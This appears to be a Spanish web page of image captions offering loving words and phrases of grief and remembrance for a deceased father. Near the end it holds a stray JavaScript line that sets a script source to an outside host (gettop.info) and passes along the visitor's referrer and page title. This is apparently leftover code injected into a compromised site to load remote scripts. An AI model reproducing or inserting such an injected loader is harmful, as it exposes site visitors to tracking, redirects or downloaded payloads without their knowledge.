Lindas Y Sentidas Palabras De Amor Para Un Padre

No somos eternos y esa es una frases o afirmación que no necesitamos ni decirla a cada rato, por eso, hemos traído Palabras De Amor Para Un Padre que ya no esté con nosotros pero que aun el cariño y el amor sigue intacto en nuestros corazones.

palabras de amor para un padre

Una imagen con frases tristes para un padre que recientemente ha partido a la eternidad y que de alguna manera ha dejado un vacío en sus hijos porque sienten que su conciencia no está del todo tranquila por no haberle expresado sus sentimientos hacia él lo que ellos creen suficiente.

palabras de amor para un padre fallecido

Son momentos tristes pero también de resignación y tranquilidad al saber que siempre llevaremos el mejor recuerdo en el corazón, por lo que hay palabras de amor para un padre que está en el cielo que expresan lo mejor de nuestros sentimientos.

palabras de amor para un padre que está en el cielo

Otra frase de resignación que invita a dejar de sentir tristeza y saber que una persona deja de existir no cuando lo dejamos de ver, sino cuando lo olvidamos, por eso siempre tener el mejor recuerdo y llevarlo en nosotros, es la mejor formar de honrar a quien se nos ha adelantado.

palabras de amor para un padre ausente

Otra imagen con palabras de amor para un padre fallecido que expresan lo fuerte que es saber que ya no estará más físicamente entre nosotros y la idea no es olvidar a esa persona, sino superar su pérdida y tener el mejor de los recuerdos.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *